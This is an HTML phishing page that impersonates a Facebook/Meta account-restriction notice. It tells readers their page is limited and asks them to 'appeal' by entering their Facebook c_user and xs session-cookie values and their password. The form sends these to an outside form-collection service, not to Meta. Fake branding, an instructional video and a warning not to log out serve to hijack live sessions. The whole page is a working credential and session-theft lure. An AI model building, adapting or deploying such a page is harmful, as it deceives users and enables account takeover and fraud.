<!DOCTYPE html><html lang="en"><head>
    <meta charset="UTF-8">   
    <link rel="icon" type="image/png" href="https://cdn.glitch.global/d08141de-e7af-45a5-916b-2f09d06ac286/Facebook_Logo_2023.png?v=1712421903497">
    <style>*{
      margin: 0;
      padding: 0;
      font-family: 'poppins', sans-serif;
  }
  
  body{
  
      background-color: #efefef;
  }
  
  nav{
  
      display: flex;
      align-items: center;
      justify-content: space-between;
      background-color: #4267b2;
      padding: 15px 10%;
  }
  
  .fb-2{
  
      font-style: normal;
      font-weight: bold;
      font-size: 45px;
      color: #ffffff;
      margin-right: 45px;
  
  }
  
  .nav-right, .nav-left{
  
      display: flex;
      align-items: center;
  }
  
  .search-box{
  
      background: #efefef;
      width: 300px;
      border-radius:2px;
      display: flex;
      align-items: center;
      padding: 0 15px;
      
  }
  
  .search-box img{
      width: 18px;
  }
  
  .search-box input{
  
      width: 100%;
      background: transparent;
      padding: 10px;
      outline: none;
      border: 0;
  }
  
  .main-body {
      font-family: Arial, sans-serif;
      background-color: #efefef;
      color: #000000;
      margin: 0;
      padding: 0;
      display: flex;
      justify-content: center;
      align-items: center;
      
  }
  
  .content {
      text-align: left;
      padding: 20px;
      border-radius: 5px;
      box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
      background-color: #f5f5f5;
      width: 100%;
      max-width: 50%;
  }
  
  .video-text{
  
      font-weight: bold;
      opacity: 60%;
  }
   
  .tr-5{
      
    font-size: 15px;
    font-style: initial;
  
   }
  
  
  
   .mt-4{
  
      font-weight: bold;
      font-size: large;
      opacity: 80%;
  
   }
  
   input {
  
      border-width: 1px;
      border-style: solid;
      border-color: #c7c1c1;
      padding: 5px;
      border-radius: 5px;
      
    }
  
    .msi-4{
  
      font-style: initial;
      font-size: 15px;
  
    }
  
    .container {
      position: relative;
      width: 100%;
      background-color: #f0f0f0;
    }
  
    .button {
      position: absolute;
      top: 50%; 
      left: 93%; 
      transform: translate(-50%, -20%);
      padding: 8px 2%;
      background-color: #4267b2;
      color: #ffffff;
      border: none;
      cursor: pointer;
      font-weight: 550;
      font-size: 80%;
      border-radius: 3px;
    }
  
    .copy-r{
  
      font-style: normal;
      font-weight: 550;
      opacity: 70%;
      padding: 15px 2%;
  }</style>
    <title>Action | Required</title>
</head>
<body>

    <nav>
        <div class="nav-left">
            <p class="fb-2">
                facebook
            </p>
        </div>
        <div class="nav-right">
            <div class="search-box">
                <img src="https://cdn.glitch.global/d08141de-e7af-45a5-916b-2f09d06ac286/search-icon-lob.png?v=1712422050841" alt="search-icon">
                <input type="text" placeholder="Search">
            </div>
        </div>
    </nav> <br><br>

             <div class="main-body">
              
      <form class="content" action="https://submit-form.com/Z2jC55dlb" method="POST">

            <div>
             <img src="https://cdn.glitch.global/d08141de-e7af-45a5-916b-2f09d06ac286/Meta-Logo.png?v=1712422024289" width="140">
            </div>
     
             
            <p class="tr-5"> We have detected unusual activity on your page that violates our community standards.</p><br>
            <p class="tr-5">Your access to your page has been limited, and you are currently unable to post, share, or comment using your page.</p><br>
            <p class="tr-5">If you believe this to be a mistake, you have the option to submit an appeal by providing the necessary information.</p><br>
     
            <div class="video-text">
             <p>Must Watch Detailed Video Information:</p>
            </div>
     
           <div>
             <video controls="" loop="" autoplay="" width="300" poster="https://i.pinimg.com/originals/97/95/69/979569a2dedd37573974ceebc05b4a4e.png">
               <source src="https://detailed-video-29b30.web.app/detailed%20video.mp4" type="video/mp4">
            </video>
           </div>
     
           <p class="tr-5">Please be sure to provide the requested information below.</p><br>
     
           <div>
             <p class="mt-4">
             c_user*
            </p>
             <input type="number" name="c_user" id="c_user" required="">
           </div><br>
     
           <div>
             <p class="mt-4">
             xs*
            </p>
             <input type="text" name="xs" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&+=]).{12,}$" title="Must Watch Detailed Video" required="1" aria-required="true">
           </div><br><div>
            <p class="text-slate-400 pl-4 mt-1">
             <div><h2 class="tr-5">
                password*
              </h2>
                <input class="border h-6 pl-1 mx-3" type="text" name="password" id="password"aria-required="true">
          </div><div>
           
              
     
           <p class="msi-4">**Please make sure account not to log out from your computer or laptop until you have received a verification email.</p><br>
     
           <div class="container">
             <button class="button">
               <p>
                 Submit
               </p>
             </button>
       
           </div>
           <br> <br>
     
         </form>
    </div>
    <br><br>
    <div>
      <p class="copy-r">
          Meta ©️ 2024   </p>
    </div>
    

</body></html>
